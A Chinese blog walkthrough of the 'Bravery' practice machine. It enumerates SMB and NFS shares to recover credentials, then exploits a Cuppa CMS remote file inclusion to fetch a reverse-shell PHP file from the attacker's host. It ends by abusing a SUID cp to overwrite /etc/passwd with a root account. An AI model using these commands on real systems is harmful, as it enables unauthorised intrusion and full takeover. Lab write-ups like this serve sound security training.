当前位置: 首页 > java >正文

Bravery靶机通关笔记

java 2025/5/13 5:57:58

一、主机发现

arp-scan -l

靶机ip为192.168.55.152

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.152

发现靶机开放了很多端口

UDP端口扫描

nmap -sU --min-rate 10000 -p- 192.168.55.152

靶机也开放了很多UDP端口

2.2目录枚举

dirb http://192.168.55.152

扫出来了很多目录

2.3指纹识别

nmap 192.168.55.152 -sV -sC -O --version-all

三、进入靶机网站寻找信息,反弹shell

3.1 80端口信息收集

访问靶机网页寻找信息

发现网站还没有搭建好,访问dirb枚举出来的敏感路径

直接访问该url是404,那就需要我们拼接一下试试看了

查看源码也没有其它信息,继续看uploads目录

找到了一个note文件

得到了CMS信息

80端口的信息很少,去8080端口再看看

3.2 8080端口信息收集

看来主要的信息在这个端口,继续扫目录

dirb http://192.168.55.152:8080

访问该目录,发现信息

都访问试试

qwertyuiop.html目录下是一张图片

把图片下载下来,看看有无隐写的内容

发现没有

public目录下是一个静态网页

8080端口的信息到此已经收集完毕,去看看其它端口开放的服务

3.3 445端口SMB服务信息收集

使用工具进行enum4linux查看smb服务信息

enum4linux 192.168.55.152

发现SMB服务可以匿名登陆

还有几个用户名

smbclient //192.168.55.152/anonymous -N
以匿名模式登陆smb服务,将文件下载到kali本地

翻译了一下发现没啥信息

3.4 nfs目录挂载

继续尝试2049端口开启的nfs服务

showmount -e 192.168.55.152
mkdir 1
mount -t nfs 192.168.55.152:/var/nfsshare ./1

成功挂载

发现有一个password.txt文件

根据提示,这个特殊文件名应该就是密码

猜测该密码是david的

3.5 登陆david的SMB服务

试试david的SMB服务

smbclient //192.168.55.152/secured -U david
qwertyuioplkjhgfdsazxcvbnm

成功登陆david账户

将三个文件都下载下来看看

根据文件内容找到了新页面

随后找到了登录框

点击此即可

查查该框有啥漏洞可以利用

searchsploit cuppa

成功找到一个文件包含漏洞

查看该exp后找到漏洞利用方法

发现可以远程执行文件包含

那直接使用kali本机的反弹shell文件

python -m http.server 80
nc -lvvp 4444
http://192.168.55.152/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.55.147/1.php

成功拿到shell

四、提权

4.1靶机信息收集

查看有无定时任务

crontab -l

继续寻找SUID文件

find / -perm  -4000 -print 2>/dev/null

发现cp命令具有SUID权限,那直接新建一个具有root权限的用户,然后添加到/etc/passwd即可

openssl passwd -1 -salt 123456 123456  生成密码
cat /etc/passwd    将所有的用户密码文件放到新文件夹中
cd /tmp   tmp文件夹权限较高echo 'root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
david:x:1000:1000:david:/home/david:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
geoclue:x:997:995:User for geoclue:/var/lib/geoclue:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
libstoragemgmt:x:995:991:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
gluster:x:994:990:GlusterFS daemons:/var/run/gluster:/sbin/nologin
unbound:x:993:989:Unbound DNS resolver:/etc/unbound:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
colord:x:992:988:User for colord:/var/lib/colord:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sssd:x:990:984:User for sssd:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
setroubleshoot:x:989:983::/var/lib/setroubleshoot:/sbin/nologin
gnome-initial-setup:x:988:982::/run/gnome-initial-setup/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
ossec:x:1001:1002::/var/ossec:/sbin/nologin
ossecm:x:1002:1002::/var/ossec:/sbin/nologin
ossecr:x:1003:1002::/var/ossec:/sbin/nologin      
rick:x:1004:1004::/home/rick:/bin/bash' >> pp     将文件写入到新的pp文件中echo 'pp:$1$123456$wOSEtcyiP2N/IfIl15W6Z0:0:0::/root:/bin/bash' >> pp   在pp文件下追加新建的pp用户
cp pp /etc/passwd   将pp文件覆盖原本的/etc/passwd文件
su pp
123456

成功提权!

http://www.xdnf.cn/news/5564.html

相关文章:

  • 机器学习管道 pipeline
  • OpenCV中Canny、Sobel和Laplacian边界检测算法原理和使用示例
  • django之视图
  • OpenCV图像金字塔详解:原理、实现与应用
  • 医院保洁智能化管理新范式:诺怀云医院后勤解决方案的实践探索
  • edge设置位IE模式打开网页
  • Java设计模式之装饰器模式:从基础到高级的全面解析(万字解析)
  • 【速写】KV-cache与解码的再探讨(以束搜索实现为例)
  • C 语言_可变参数宏详解
  • 硅基计划2.0 学习总结 壹 Java初阶
  • pytorch模型画质增强简单实现
  • STM32入门教程——GPIO输出
  • Java设计模式之代理模式:从入门到精通(保姆级教程)
  • http和https的区别
  • 键盘RGB矩阵与LED指示灯(理论部分)
  • 外出充电不发愁,倍思便携式移动电源成出行新宠
  • 数据治理域——数据治理体系建设
  • HTML17:表单初级验证
  • 通义千问席卷日本!开源界“卷王”阿里通义千问成为日本AI发展新基石
  • 【氮化镓】GaN在不同电子能量损失的SHI辐射下的损伤
  • Spring MVC参数传递
  • 图论拓扑排序
  • 前端 CSS 样式书写与选择器 基础知识
  • 反转链表 - 简单
  • SET NX互斥功能的实现原理
  • 【AI大语言模型本质分析框架】
  • 在Mac环境下搭建Docker环境的全攻略
  • 技术视界 | 青龙机器人训练地形详解(四):复杂地形精讲之斜坡
  • 因子分析基础指南:原理、步骤与地球化学数据分析应用解析
  • 数据出境的安全合规思考